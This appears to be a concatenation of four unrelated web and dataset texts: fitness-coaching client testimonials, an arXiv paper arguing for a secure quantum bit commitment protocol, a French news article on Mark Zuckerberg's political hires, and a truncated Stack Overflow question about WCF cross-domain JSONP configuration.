I saw incredible results in my body and felt so much better physically and mentally. My body feels strong and my muscles have never been so developed and toned! There were many times that I would focus on the numbers (weight, measuring tape) and become discouraged, but Amanda taught me to trust the process, forget about the numbers, and how to feel my way to positive results. I feel the healthiest I have ever been in my life! There is no other person who could be as supportive, encouraging, and motivating than Amanda! It is so apparent that she is beyond educated and passionate about her job and her clients!
— Jennifer
AMANDA'S
Diary of a Coach
JESSICA
Jessica is post pregnancy and on a mission. After just 12 weeks of Online Coaching, she is now in her pre-baby clothes, 15lbs lighter, gaining muscle and has learned easy ways to prep meals for both herself and her family while still living life and enjoying being social.
JILL
Week 1 to Week 4 of Online Coaching. Not only was she able to drop 9lbs, 2.5 inches from her waist and 2.5 inches from her hips, but she now fits perfectly in her wedding dress and feels incredible!
STEPHANIE
Enough was enough, she wanted to feel better so she took the reigns and completely revamped her lifestyle. From a new daily regimen, to learning how to make her own food, step by step we created weekly goals that allowed her to be successful as she created an entirely new way of living.
DARA
This is just the beginning for this chef. Surrounded by food day in and day out, she used to find it challenging to make any headway towards her health goals. Using flexible dieting to find balance and switching from all cardio to focusing on resistance training, she has made great changes in her physique to date. While the scale has only decreased in weight by 3lbs, she has lost more than 10inches all over her body.
LORI
After 6 weeks of Online Coaching, Lori has lost 16lbs, 3 inches from her waist and 3 inches from her hips. Her dedication to herself, inner strength, perseverance and the ability to no longer allow outside stresses of life affect her health have allowed her to make these external changes, for these are the icing on the cake to all she has accomplished on the inside.
LESIA
This single mom and career woman has found that having a routine and being held accountable are key for keeping her on track towards her goals. Through family meal prep and including her kids in her workouts, she has created a new foundation of healthy habits for not only herself, but her family.
|
{
"pile_set_name": "Pile-CC"
}
|
---
abstract: 'This article describes a quantum bit commitment protocol, QBC1, based on entanglement destruction via forced measurements and proves its unconditional security.'
author:
- |
\
\
Horace P. Yuen\
Department of Electrical Engineering and Computer Science\
Department of Physics and Astronomy\
Northwestern University, Evanston Il. 60208\
yuen@eecs.northwestern.edu
title: An Unconditionally Secure Quantum Bit Commitment Protocol
---
**Note:** This paper is an elaboration of my 2006 QCMC paper, arXiv: 0702074v4(2007), published in its Proceedings volume. It was submitted in Dec 2009 as an “invited paper” to a journal, which was withdrawn half a year later because the editors found it incomprehensible. I hope it may make better sense to some other readers.
My reasons for the impossibility of QBC “impossibility proofs” are described in ref \[1\]. Over the years I have produced several QBC protocols that I thought were secure, but when concealing they are not binding due to the scope of entanglement attack that works even across teleportation. I did not and do not see such scope spelled out anywhere, though before putting such papers on the arXiv I should have tried harder to find out whether entanglement attack works in my cases, which I eventually did. Since 2003 I have not received any substantial negative comment on my QBC arXiv papers, only getting a few questions and agreements, and thus the arXiv papers have not served the purpose of soliciting technical disagreements I sought in this controversial subject.
I have been as sure that the present protocol is secure as most results I ever published, but I knew the environment of disagreement and did not submit any QBC paper to any journal until Dec 2009. If this present paper is indeed incomprehensible, it would have to be expanded before submission to a journal. In the meantime a QBC possibility paper by G. P. He, J. Phys. A: Math. Theor. 44, 445305 (2011) has appeared in a reputable journal. That protocol is based on an entirely different mechanism from that of this paper, and gives a weaker form of security. Generally, the best a QBC impossibility proof can do is to show a certain type of QBC protocols cannot be unconditionally secure. It cannot show general impossibility for the simple reason that not all QBC protocols can be captured in any mathematical formulation just within nonrelativistic quantum mechanics \[1\].
My view is that QBC can actually be practically developed and it could perform cryptographic functions with security that is impossible to achieve classically. However, it would not be through the impractical protocol of this paper and the security would not be “unconditional” which is never needed in practice. It appears such QBC development is only possible after the entrenched contrary view on unconditionally secure QBC is sufficiently softened up. I hope this paper would contribute to such end.
Introduction {#sec:intro}
============
It is nearly universally accepted that unconditionally secure quantum bit commitment (QBC) is impossible. This is taken to be a consequence of the Einstein-Podolsky-Rosen(EPR) type entanglment cheating. For detailed discussion with historical remarks on the impossibility of secure QBC and the various impossibility proofs, see ref [@yuen1]-[@dariano07]. In the following, a new approach is described that lies outside the formulation of these impossible proofs. A secure QBC protocol, to be called QBC1, is presented together with a full proof of its unconditional security. This paper is completely self-contained other than background knowledge of quantum mechanics.
QBC Formulation and the Impossibility Proof {#sec:form}
===========================================
In a [*bit commitment*]{} scheme, one party, Alice, provides another party, Bob, with a piece of evidence that she has chosen a bit (0 or 1) which is committed to him. Later, Alice would [*open*]{} the commitment by revealing the bit to Bob and convincing him that it is indeed the committed bit with the evidence in his possession and whatever further evidence Alice then provides, which he can [*verify*]{}. The usual concrete example is for Alice to write down the bit on a piece of paper, which is then locked in a safe to be given to Bob, while keeping for herself the safe key that can be presented later to open the commitment. The scheme should be [*binding*]{}, i.e., after Bob receives his evidence corresponding to a given bit value, Alice should not be able to open a different one and convince Bob to accept it. It should also be [*concealing*]{}, i.e., Bob should not be able to tell from his evidence what the bit is. Otherwise, either Alice or Bob would be able to cheat successfully.
In standard cryptography, secure bit commitment is to be achieved either through a trusted third party, or by invoking an unproved assumption concerning the complexity of certain computational problems. By utilizing quantum effects, specifically the intrinsic uncertainty of a quantum state, various QBC schemes not involving a third party have been proposed to be unconditionally secure, in the sense that neither Alice nor Bob could cheat with any significant probability of success as a matter of physical laws. In 1995-1996, a supposedly general proof on the impossibility of unconditionally secure QBC and the insecurity of previously proposed protocols were presented [@may1]-[@lc1]. Henceforth it has been generally accepted that secure QBC and related objectives are impossible as a matter of principle [@lc2]-[@sr].
There is basically just one impossibility proof, which gives the EPR attacks for the cases of equal and nearly equal density operators that Bob has for the two different bit values. The proof purports to show that if Bob’s successful cheating probability $P^B_c$ is close to the value $\frac{1}{2}$, which is obtainable from pure guessing of the bit value, then Alice’s successful cheating probability $P^A_c$ is close to the perfect value 1. The impossibility proof describes the EPR attack on a specific type of protocols, and then argues that all possible QBC protocols are of this type.
The formulation of the standard impossibility proof can be cast as follows. Alice and Bob have available to them two-way quantum communications that terminate in a finite number of exchanges, during which either party can perform any operation allowed by the laws of quantum physics, all processes ideally accomplished with no imperfection of any kind. During these exchanges, Alice would have committed a bit with associated evidence to Bob. It is argued that, at the end of the commitment phase, there is an openly known entangled pure state $\ket{\Phi_\sb}$, $\sb \in \{0,1\}$, shared between Alice who possesses state space $\cH^A$, and Bob who possesses $\cH^B$. For example, if Alice sends Bob one of $M$ possible states $\{
\ket{\phi_{\sb i}} \}$ for bit with probability $p_{\sb i}$, then $$\ket{\Phi_{\sb }} = \sum_i \sqrt{p_{\sb i}}\ket{e_i}\ket{\phi_{\sb i}}
\label{eq:1}$$ with orthonormal $\ket{e_i} \in \cH^A$ and known $\ket{\phi_{\sb i}}
\in \cH^B$. Alice would open by making a measurement on $\cH^A$, say $\{ \ket{e_i} \}$, communicating to Bob her result $i_0$, then Bob would verify by measuring the corresponding projector ${|\phi_{\sb i_0}\rangle\langle \phi_{\sb i_0}|}$ on $\cH^B$.
When classical random numbers known only to one party are used in the commitment, they are to be replaced by corresponding quantum entanglement purification. The commitment of $\ket{\phi_{\sb i}}$ with probability $p_{\sb i}$ in (\[eq:1\]) is, in fact, an example of such purification. Generally, for any random $k$ used by Bob, it is argued from the doctrine of the “Church of the Larger Hilbert Space” that it is to be replaced by the purification $\ket{\Psi}$ in $\cH^{B_1} \otimes \cH^{B_2}$, $$\ket{\Psi} = \sum_k \sqrt{\lambda_k} \ket{f_k}\ket{\psi_k},
\label{eq:2}$$ where $\ket{\psi_k} \in \cH^{B_2}$. The {$\ket{f_k}$} are complete orthonormal in $\cH^{B_1}$ kept by Bob while $\cH^{B_2}$ would be sent to Alice.
For unconditional, rather than perfect, security, one demands that both cheating probabilities $P^B_c - \frac{1}{2}$ and $P^A_c$ can be made arbitarily small when a security parameter $n$ is increased [@may1]. Thus, [*unconditional security*]{} is quantitatively expressed as $$\qquad \lim_n P^B_c = \frac{1}{2},\quad \lim_n P^A_c = 0.
\label{eq:3}$$ The condition (\[eq:3\]) says that, for any $\epsilon > 0$, there exists an $n_0$ such that for all $n > n_0$, $P^B_c - \frac{1}{2} <
\epsilon$ and $P^A_c < \epsilon$, to which we may refer as $\epsilon$-[*concealing*]{} and $\epsilon$-[*binding*]{}. These cheating probabilities are to be computed purely on the basis of logical and physical laws, and thus would survive any change in technology, including an increase in computational power. In general, one can write down explicitly the optimal $P^B_c$, $$P^B_c = \frac{1}{4}\left(2 + {\| \rho^B_0 - \rho^B_1 \|_1}\right),
\label{eq:4}$$ where ${\| \cdot \|_1}$ is the trace norm, ${\| \tau \|_1} \equiv \tr
(\tau^\dag \tau)^{1/2}$ for a trace-class operator $\tau$.
The entanglement cheating mechanism is explicitly spelled out in the impossibility proof. Under perfect concealing $P^B_c=\frac{1}{2}$, it follows from (\[eq:4\]) that the state $\rho^B_b$ at Bob’s possession obeys $\rho^B_0=\rho^B_1$. Hence by the Schmidt decomposition Alice can turn $\ket{\phi_{0i}}$ into $\ket{\phi_{1i}}$ by a unitary transformation on $\cH^A$ in her possession, thus succeeds in cheating perfectly. Under approximate concealing, an explicit transformation on $\cH^A$ can be similarly identified [@yuen2]-[@yuec] which leads to $$4(1-P^B_c)^2 \le P^A_c \le 2 \sqrt{P^B_c
(1-P^B_c)}.
\label{eq:5}$$ The lower bound in (\[eq:5\]) yields the following impossibility result, $$\lim_n P^B_c = \frac{1}{2} \,\, \Rightarrow
\,\, \lim_n P^A_c = 1
\label{eq:6}$$ Note that the impossibility proof makes a stronger statement than the mere impossibility of unconditional security, i.e., (\[eq:6\]) is stronger than (\[eq:3\]) not being possible.
The assumption in the impossibility formulation that $\ket{\Phi_{\sb }}$ are openly known has been challenged. In a multi-pass protocol where Alice and Bob exchange states, each $\ket{\phi_{\sb i}}$ becomes of the form $\ket{\phi_{\sb i k}}$ [@sr] $$\ket{\phi_{\sb ik}} = U^A_{\sb i_n} \ldots U^A_{\sb i_2} U^B_{k_1}
U^A_{\sb i_1} \ket{\phi_0}.
\label{eq:7}$$ where $U^A_{\sb il}$ are unitaries that Alice applies and $U^B_{\sb kj}$ are applied by Bob. The ancilla state $\ket{e_i}$ also separates into $\ket{e^A_i}\ket{e^B_k}$ with $\ket{e^A_i}$ in Alice’s possession and $\ket{e^B_k}$ in Bob’s. It is clear that the exact $\ket{e^B_k}$ may be kept secret by Bob, in an unnormalized form that would include both the entanglement basis and the probability of each state in it. The question is why secure QBC is impossible under such added randomness, whose quantum purification is either unknown to anyone as in the case of classical random number generation from a piece of macroscopic equipment, or at least known only to the party who preforms the entanglement purification.
For some discussion of this point of employing unknown randomness, see [@yuec]-[@yueb2] and references cited therein. It turnes out it appears impossible to get a secure protocol with this approach. For the case of perfect concealing, a general proof of this impossibility was given in [@yuen2] for a two-pass protocol. A different argument applicable to multi-pass protocol was given by Ozawa[@oz] and later independently by Cheung[@chau1]. Simple as well as more complicated proofs concerning all natural protocols of this kind in the case of approximate concealing are also available. See [@yuen1]-[@dariano07], [@chau2].
In the above formulation one may consider, *more generally*, the whole $\ket{\Phi_{\sb }}$ of (1) as the state corresponding to the bit with Alice sending $\cH^A$ to Bob at opening who verifies by measuring on the total $\ket{\Phi_{\sb }}$. Similarly in the multi-pass case, (7) is generalized from $\ket{\phi_{\sb ik}}$ to $\ket{\Phi_{\sb ik}}$ with different subspaces of $\cH^A$ and $\cH^B$ being exchanged during each pass. The above quantitative conclusion is not affected. Note, however, that either Alice or Bob has to provide the initial state $\ket{\phi_0}$. Indeed, $\ket{\phi_0}$ must be on a large enough dimension state space and openly known to both parties if either can perform random number purification. It is more convenient to just let each party supply its own state space at each turn when needed, and let $\cH^A$ and $\cH^B$ be their individual total spaces as just indicated. In contrast to one-pass protocols in [@lc1], there is then always the question of “*honesty*” in multi-pass protocols. It is clear that some form of state checking may be necessary to execute these protocols.
New Approach {#sec:newappr}
============
In the impossibility proof formulation the probability of interactive checking between Alice and Bob, similar to there in QKD protocol such as BB84, is not explicitly accounted for. Even if Bob’s check on Alice can be postponed to just before opening, Alice’s check on Bob must be carried out during the commitment phase to maintain $\epsilon$-concealing, The implicit assumption must be, therefore, that such checking could be satisfied perfectly without affecting the protocol. In this section, a new approach to QBC protocol would be described that shows such implicit assumption cannot be true. This approach would be utilized in the next Section \[sec:qbc1\] to show how a specific secure protocol can be obtained.
Consider the following situation or “protocol": Bob sends Alice a sequence of $n$ qubits, each randomly in one of the two orthogonal states $\ket{l_j}, j \in \{1,2\}$, which are themselves chosen randomly on a fixed great circle $C$ of the qubit Bloch sphere. The index $l$ indicates the position in the $n$-qubit sequence. We assume for convenience that Bob entangled each $l$th qubit to a qubit ancilla he keeps. Alice randomly picks one $\ket{\bar{l}}$, modulates it by $U_{0}=R(\frac{\pi}{2})$ or $U_{1}=R(-\frac{\pi}{2})$, rotation by two different angles on $C$, depending on $\sb\ \in \{0,1\}$, and sends it back to Bob as commitment. Alice opens by sending back the rest and revealing everything. Let $|k\rangle \in
\cH^{A}$ be the orthogonal entanglement ancilla states, $P$ the cyclic shift unitary operator on $n$ qubits, $P^n=I$. Suppose Alice entangles in a minimal way, $$\label{eq:8}
|\Psi_{\sb}\rangle=U_{\sb}\frac{1}{\sqrt{n}}\sum_{k=1}^n|k\rangle\otimes P^{k}|1_{j}\rangle ...|n_{j}\rangle$$ where $|1_{j}\rangle$ is acted on by $U_{\sb}$. This “protocol” can be shown to be $\epsilon$-concealing, and Alice can locally turn $|\Psi_{0}\rangle$ to $|\Psi_{1}\rangle$ near perfectly in a standard entanglement cheating.
Consider a protocol with the following added checking to the above. Before opening, Bob asks Alice to send back a fraction $\lambda$, say $\lambda=\frac{1}{2}$, of the $n$ qubits chosen randomly by Bob for checking. If Alice replies that fraction contains the committed one, Bob would ask to check the remaining $1-\lambda$ fraction instead. Assuming Alice has to answer correctly, she must measure on $\cH^A$ to get a specific $\ket{k}$. After Bob’s checking, he still has a uniform distribution on exactly what the original committed qubit is according to his own positions. Thus the protocol *remains* $\epsilon$-concealing if $n$ is sufficiently large, while Alice has lost her entanglement cheating capability. This is what was referred to as “the destruction of entanglement for cheating" in several of my previous protocols, beginning with a first one at the 2000 QCMC meeting in Capri, Italy.
Such ploy did not lead to a secure protocol because the entanglement (\[eq:8\]) or a similar sparsely entangled one was not insisted upon as part of the protocol prescription. Before it will be discussed in the following how the entanglement (\[eq:8\]) can be enforced, note that Alice can retain her entanglement cheating capability by other entanglements, in particular by the full $n$-permutation group. She could name her entanglement basis vectors $\ket{k}$ by the original positions of the qubits Bob sent, $$\label{eq:9}
\ket{k}\rightarrow\ket{1(k_1),\ldots,n(k_n)}$$ where $l(k_l)$ indicated that original qubit $l$ is at position $k_l$ corresponding to $\ket{k}$. When she is asked to return a fraction $\lambda$ that has positions $\lambda(m)$, $m\in\overline{1-n}$, she would perform a Lüders measurement, that is, a projection $P^{\prime}$ into the subspace in $\cH^A$ that fixes the {$\lambda(m)$} position. If the entanglement is sufficient dense, the remaining $1-\lambda$ fraction is still entangled in the remaining ancilla space $(1-P^{\prime})\cH^A$, and entanglement cheating remains possible. With the entanglement (\[eq:8\]) there is no such degeneracy. In fact, $P^{\prime}\cH^A=\cH^A$. Thus, fixing the position of just one qubit already fixes the positions of all the others.
Note that the checking of ancilla is naturally included in the generalized formulation discussed in the last paragraph of section \[sec:form\]—there is no system or subsystem that cannot be exchanged. The question now is why Alice should entangle as in (\[eq:8\]) rather than one which allows her to cheat later. In the QBC literature, with the possible excepting of (\[eq:2\]), the claim has always been that even under *honest* following of the protocol prescription, no protocol can be secure [@lc2]-[@sr]. In the presence of interactive checking as above, we here conclusively shown that such claim is incorrect.
The “honesty" assumption is widely used in the literature to describe multi-pass protocol including those for quantum coin tossing [@dk]. It may or may not make sense depending on whether the“honest" action can in principle be checked by the other party without rendering the protocol ineffective. For example, in the simple one-pass protocol of [@lc1], it makes no sense to require Alice to be honest and does *not* entangle. It is clear that an actual physical entanglement is needed for the EPR cheating even when the protocol is perfectly concealing. Note that this is in fact the *basis* of the success of checking for preventing entanglement cheating with (\[eq:8\]), that only classical randomness is left after checking. Thus, Alice would entangle anyway in the situation of [@lc1] and the simple protocol that requires such “honesty” is not secure.
In a multi-pass protocol, there is always the question whether “honest entanglement” or any other prescription of the protocol is followed. Even with just a two-pass QBC protocol in which Bob first sends Alice some qubits in prescribed states, including the above “protocol” involving (\[eq:8\]), he can easily cheat by sending in other qubits instead. For example, he could send in identical fixed qubit states and so he would know how to measure to distinguish $\sb=0,1$ from the committed qubit with considerable $P^B_c>\frac{1}{2}$ for any $\{U_0, U_1\}$ pair. He is prevented from such cheating via checking of one form or another.
A crucial question is: what happens when one party is found cheating during protocol execution. Clearly the party cannot be allowed to keep cheating indefinitely, if only because of “intent” [@yuec] since the party does not need to participate to begin with. I have previously described [@app] several approaches to deal with this problem which has *not* yet received an adequate discussion in the literature, but which can be solved in one stroke by an honesty assumption that requires all the parties to be perfectly honest in their prescribed actions and thus no cheating would even be found before opening. This is a perfectly reasonable working assumption for the ideal protocol under discussion *as long as* the action can be checked, in view of the discussion just given above. It is equivalent to the assignment of infinite penalty in a game type formulation [@app], and it allows us to bring forth our new point without the burden of technicalities. It is also exactly what has been implicitly assumed in the literature as we mentioned.
Note that the whole protocol may need to be started all over again after a checking. It is easy to see that in the absence of resource constraint as in the case of all QBC impossibility proof formulations thus far, one party can check the same state an arbitrarily large number of times before proceeding. The total number of checks may grow multiplicatively, not just linearly, with the number of state checking. It is reasonable to count cheating detection probability as the party’s failure probability in $P^A_c$ and $P^B_c$. Thus, whenever a bound is imposed on the allowable total number of cheatings getting caught, an unconditionally secure protocol would be obtained which is equivalent to the honest assumption. This is because both $P^A_c$ and $P^B_c$ can be brought arbitrarily close to their prescribed $\epsilon$-level with a large enough number of checkings on each state.
The point that was made in this section in connection with (\[eq:8\]) has the following *general implication* independently of whether a secure protocol can be made on that basis: There is no general impossibility proof that shows the entanglement formed by one party as prescribed by a QBC protocl would have effective remaining entanglement after checking. In the next section, however, we do exhibit such a specific secure protocol.
Secure Protocol QBC1 {#sec:qbc1}
====================
We consider the following protocol QBC1 [@qbc3] in which Bob sends Alice a sequence of $n$ qubits as described in the last section, requiring Alice to entangle as in (\[eq:8\]). We will show later in appropriate places how that as well as any other prescribed states for Alice and Bob can be checked. That the protocol is $\epsilon$-concealing is intuitively obvious, and can be proved as follow. For simplicity we let the protocol prescribe that each of the qubit state Bob sends is entangled with an ancilla in his possession. Alice can check this before proceeding by asking Bob to send her the qubit ancilla and measuring to verify.\
Concealing Proof for QBC1:
First we assume that Bob does not permutation entangle the $n$ qubit. It is technically messy to show concealing if she does, but the absence of such permutation entanglement can be assured by requiring Bob to permutation entangle as in (\[eq:8\]), and destroyed by Alice asking to check one or more of the qubits. That Bob did entangle in such manner in the first place can be checked by asking him to send in the ancilla for Alice to check.
For simplicity we do not distinguish here a qubit state from the qubit which is clear from context. Let $a_l$ be the ancilla part of Bob’s states entangled to the $l$th qubit. Then $a_l=\frac{I}{2}$ without the $i$th qubit and $$\label{eq:10}
\rho_\sb=\frac{1}{n}\sum_{l=1}^n a_1\otimes\ldots\otimes(\sigma_\sb a_l)\otimes\cdots\otimes a_n$$
In (10), $(\sigma_\sb a_ l)$ denotes the state obtained by pairing of the $l$th ancilla state to the committed qubit, $\sigma_\sb$ is the committed part of the committed qubit-ancilla entangled pair. We have $(\sigma_\sb a_l)=\sigma_\sb\otimes a_l$ when the pairing is incorrect but is a properly qubit-ancilla state when they match. From (\[eq:10\]), $$\label{eq:11}
n(\rho_0-\rho_1)=[(\sigma_0 a_{\bar{l}})-(\sigma_1 a_{\bar{l}})]\otimes_{l\neq \bar{l}} a_l+(\sigma_0-\sigma_1)\otimes_{l}a_l$$
where $\bar{l}$ is the actual position of the committed qubit. Since $\sigma_0=\sigma_1=\frac{I}{2}$ for incorrect matching and $\|(\sigma_0-\sigma_1)\otimes a\|_1=\|\sigma_0-\sigma_1\|_1$ for all density operators $\sigma_0$, $\sigma_1$ and $a$, from (\[eq:11\]) $$\label{eq:12}
\|\rho_0-\rho_1\|_1=\frac{1}{n}\|(\sigma_0 a_{\bar{l}})-(\sigma_1 a_{\bar{l}})\|_1=\frac{2}{n}$$ which can be made arbitrarily small with large n. Equation (\[eq:12\]) expresses exactly the intuitively obvious fact that Bob succeeds in cheating when and only when he guesses correctly which original qubit the committed qubit is.\
Binding Proof for QBC1:
Since $\sigma_\sb=\frac{I}{2}$ without Bob’s ancilla, the probability that Alice can determine the state of the committed qubit she chooses for commitment is arbitrarily small, given by $\frac{1}{M}$ for $M$ possible states on $C$ and is zero asymptotically. Without the possibility of entanglement cheating, Alice can simply declare the bit she wants to open. In that situation $P^A_c$ is given by the inner product square of the two possible committed state. With our choice $P^A_c=0$ since the two states for the two different $\sb$ values are orthogonal.\
Note that as in the discussion of QBC since the beginning, an $\epsilon$-concealing protocol can be made $\epsilon$-binding in a sequence of committed qubits to obtain a single secure bit whenever $P^A_c$ is not too close to 1 for each original qubit. In the above QBC1, such a sequence has also been indicated in our previous version in [@qbc3] for such purpose. It is not needed if the two bit states are orthogonal or nearly orthogonal and if completely random qubit states on $C$ are supplied by Bob.
It remains to show that (\[eq:8\]) can be checked and no security leak could occur during the checking process. In contrast to the states sent in by Bob, it is more complicated to check (\[eq:8\]) since Alice already committed by then, but it can be done as follow.\
Checking of Entanglement (\[eq:8\]):
Alice would first send her ancillas of (8) to Bob with an entanglement basis unknown to him. Then Bob sends back Alice’s committed qubit to her who would turn it back to the original state by reversing her $U_b$. Then she sends back all qubits to Bob who can thus (\[eq:8\]).
We now show there can be no security compromise in the checking and each party must follow the prescription as all relevant states can be checked. First, Bob can derive no information on which qubit he sent is committed without first knowing what qubit positions are indicated by what ancilla state. The ancilla he so receives back from Alice is a totally random state to him. Secondly, Alice must send in her entanglement ancilla and tell Bob later exactly what the total state is, as prescribed in the checking. Third, that Bob then sends back the correct qubit can be checked by Alice via asking Bob to send back all the relevant states in his possession which include his ancilla, Alice’s committed qubit, and her ancilla that was sent him. Alice can then check similar to the beginning check on Bob’s $n$ qubit ancilla state. Finally, Alice must send back the proper states or else Bob cannot verify (\[eq:8\]).
We have completed the security proof with proper operation procedure for QBC1. Assuming honest operation that we have shown can all be checked, the protocol can be simply summarized in the following:
0.1in
0.11in
Scope of QBC Possibility {#sec:scope}
========================
It has long been known that a trusted third party or special relativistic effects can be used to establish secure bit commitment protocol both classically and quantum mechanically. Furthermore, D’Ariano has suggested [@dariano09] that casuality or time order cannot be purified and is built into quantum mechanics already in a way that would imply special relativity. If true this would imply quantum mechanics by itself would ensure the possibility of secure QBC similar to Kent’s relativistic protocol [@kent]. Cheung [@chau3] has recently proposed a secure protocol on the basis of timing effect. In this paper, we show that quantum mechanics allows secure QBC without invoking causality or timing, in a way that was first described in [@qbc3].
The exact mechanism of how our QBC1 falls outside the standard impossibility proof is made clear in section \[sec:newappr\] above. There seem to be some vague claims of universal QBC impossibility in ref [@dariano07] and [@chis]. Both papers are presented in unfamiliar mathematical formulation of $C^\ast$-algebra or “quantum comb” with no translation into the usual formulation. In both of these new formulations, there is no clear indication on exactly what would happen when one party is found cheating during protocol execution. Just aborting the protocol is not enough as one party can keep on cheating as discussed in section \[sec:newappr\]. While the number of allowable protocol abortions may be bounded in [@chis], cheating detection entails no penalty in any form. More significantly, it appears there is no restriction put on the parties’ entanglement purification and a private ancilla not to be checked is allowed, thus excluding QBC1 in these formulations.
A most important point that is not addressed before in all the impossible proofs that claim universality is *what the proof is* that all possible QBC protocols have been included. A general discussion of this issue can be found in [@yuen1]. A main point that has *not* even been made clear in [@yuen1] is that a ‘machine’ formulation cannot capture all the possible protocols, classical or quantum, that can be clearly formulated with ordinary natural language due to the ‘meaning’ problem. Specific intended meaning can be captured by a mechanical process, but not all possible meaning in a general context. This is the situation of human knowledge that, I believe, would not be changed in the future. In the present QBC issue, one manifestation of this situation is that there is no general mathematical definition which captures all possible QBC protocols.
As a concluding remark, practical QBC protocols can be developed that can be proved secure within technological limits that are unlikely to be removed in the foreseeable future. Entanglement across many qubits already by itself falls under these limits. Such implementable protocols could be practically significant even if they are not unconditionally secure under the impractical assumption of ideal system devices and components.
Acknowledgments {#acknowledgments .unnumbered}
===============
I would like to thank C.Y. Cheung, G.M. D’Ariano, and M. Ozawa for very useful discussions.
[99]{}
H.P. Yuen, quant-ph/0808.2040v1, (2008).G.M. D’Ariano, Kretschmann D, Schlingemann D and Werner R F, Phys. Rev. A [**76**]{}, 032328 (2007).D. Mayers, Phys. Rev. Lett. [**78**]{}, 3414 (1997)H.K. Lo and H.F. Chau, Phys. Rev. Lett. [**78**]{}, 3410 (1997).H.K. Lo and H.F. Chau, Fortschr. Phys. [**46**]{}, 907 (1998).H.K. Lo and H.F. Chau, Physica D [**120**]{}, 177 (1998).G. Brassard, C. Crépeau, D. Mayers, and L. Salvail, preprint quant-ph/9712023.G. Brassard, C. Crépeau, D. Mayers, and L. Salvail, preprint quant-ph/9806031.R.W. Spekkens and T. Rudolph, Phys. Rev. A [**65**]{}, 012310 (2001).,H.P. Yuen, quant-ph/0109055.H.P. Yuen, in [*Quantum Communication, Measurement, and Computing*]{}, ed. by J.H. Shapiro and O. Hirota, Rinton Press, 2003; p. 371; also preprint quant-ph/0210206.H.P. Yuen, quant-ph/0207089v3 (2002).H.P. Yuen, quant-ph/0305144v3 (2003).M. Ozawa, private communication, Sep 2001.C.Y. Cheung, quant-ph/0508180 (2005).C.Y. Cheung, quant-ph/0601206 (2006).C. Döscher and M. Keyl, Fluct. Noise Lett. [**4**]{}, R125 (2002); also quant-ph/0206088.See [@yuen1] and the appendices of H.P. Yuen, quant-ph/0305142 (2003) and quant-ph/0305143 (2003).Essentially the same protocol is called QBC3 in H.P. Yuen, in [*Quantum Communication, Measurement, and Computing*]{}, ed. by O. Hirota, J.H. Shapiro and M. Sasaki, NICT Press, 249 (2007), Japan; also quant-ph/0702074v4 (2007).G.M. D’Ariano, private communication, Nov 2009.A. Kent, Phys. Rev. Lett. [**83**]{}, 1447 (1999).C.Y. Cheung, quant-ph/0910.2645 (2009).G. Chisibella, G.M. D’Ariano, P. Pesinotti, D. Schlingemann, and R.F. Werner, quant-ph/0905.3801 (2009).
|
{
"pile_set_name": "ArXiv"
}
|
Créer un réseau social, faire fortune, influer sur l’opinion et s’entourer de politiciens… pour se faire élire à la tête de la plus grande puissance mondiale ? Mark Zuckerberg, fondateur de Facebook et milliardaire philanthrope, accumule les indices laissant présager une politisation de son action. Selon le site Politico, le PDG du réseau social âgé de 33 ans et sa femme Priscilla Chan viennent de recruter Joel Benenson, le grand manitou des sondages des Clinton. Officiellement pour un job de consultant au sein de la fondation philanthropique du couple : la Chan Zuckerberg Initiative dont le but est de «Faire évoluer le potentiel humain et promouvoir l’égalité des chances».
N’empêche. Depuis que Zuckerberg a publié des photos de ses voyages notamment à travers l’Iowa, le premier état à organiser des primaires, beaucoup lui prêtent des intentions moins charitables. Au point qu’il a dû démentir le 21 mai sur sa page Facebook son intention de briguer en 2020 l’investiture démocrate : «Mon objectif cette année est de visiter chaque Etat (fédéré) dans lequel je n’ai pas passé du temps pour m’informer des espoirs et des problèmes des gens, et savoir comment ils pensent leur travail et leurs communautés […]. Certains d’entre vous se demandent si ce challenge signifie que je me porte candidat à la présidentielle. Ce n’est pas le cas».
Qui est Joel Benenson, la nouvelle recrue de Zuckerberg ?
Joel Benenson avait joué un rôle en tant que sondeur dans la réélection de Bill Clinton en 1996, avant de devenir un des principaux conseillers de Barack Obama durant ses deux mandats. Et, de se charger par la suite de la stratégie et des sondages de la candidate Hillary Clinton en 2016.
Certes la société Benenson Strategy Group n’est chargée que d’une mission de recherche pour la fondation du couple Zuckerberg. Et ce n’est pas la première fois qu’elle collabore avec une fondation à but non lucratif puisqu’elle a travaillé à la «Born this way foundation» de la pop star Lady Gaga. Mais la personnalité et le CV de Benenson, qui s’est gardé de tout commentaire à Politico, alimentent les spéculations sur l’agenda caché de Zuckerberg.
D’autres signaux de politisation ont été émis
Surtout que le sondeur n’est pas la première personnalité politique d’envergure à rejoindre les rangs de Zuckerberg. En janvier dernier, c’était David Plouffe, le directeur de la campagne d’Obama de 2008, et Ken Mehlal, celui de George W Bush en 2004… sans oublier Amy Dudley, ex-conseillère en communication du sénateur démocrate de Virginie, Tim Kaine. Zuckerberg a même recruté le photographe de la Maison Blanche : Charles Ommanney, connu pour ses portraits des présidents George W. Bush et Barack Obama.
Par ailleurs, le nom de Mark Zuckerberg figure sur plusieurs listes de candidats potentiels pour l’élection présidentielle de 2020 dont celle de CNN qui le compte parmi «au moins 22 démocrates songeant à se lancer dans la course» pour la prochaine présidentielle.
|
{
"pile_set_name": "OpenWebText2"
}
|
Q:
WCF web service with CROSS Domian Ajax not working
I am getting error when calling WCF Ajax Request using jsonp
below is my web.config
<?xml version="1.0"?>
<configuration>
<system.web>
<compilation debug="true" targetFramework="4.0" />
</system.web>
<system.serviceModel>
<services>
<service name="RestService.RestServiceImpl" behaviorConfiguration="ServiceBehaviour">
<endpoint address="" binding="webHttpBinding" contract="RestService.IRestServiceImpl" behaviorConfiguration="web"></endpoint>
<endpoint address="basic" binding="basicHttpBinding" name="HttpEndPoint" contract="RestService.IRestServiceImpl" ></endpoint>
<endpoint
address="Service1.svc"
binding="mexHttpBinding"
contract="IMetadataExchange"/>
</service>
</services>
<behaviors>
<serviceBehaviors>
<behavior name="ServiceBehaviour">
<!-- To avoid disclosing metadata information, set the value below to false before deployment -->
<serviceMetadata httpGetEnabled="true" />
<!-- To receive exception details in faults for debugging purposes, set the value below to true. Set to false before deployment to avoid disclosing exception information -->
<serviceDebug includeExceptionDetailInFaults="true"/>
</behavior>
</serviceBehaviors>
<endpointBehaviors>
<behavior name="web">
<webHttp/>
</behavior>
</endpointBehaviors>
</behaviors>
<bindings>
<webHttpBinding>
<binding name="webHttpBindingWithJsonP" crossDomainScriptAccessEnabled="true" />
</webHttpBinding>
</bindings>
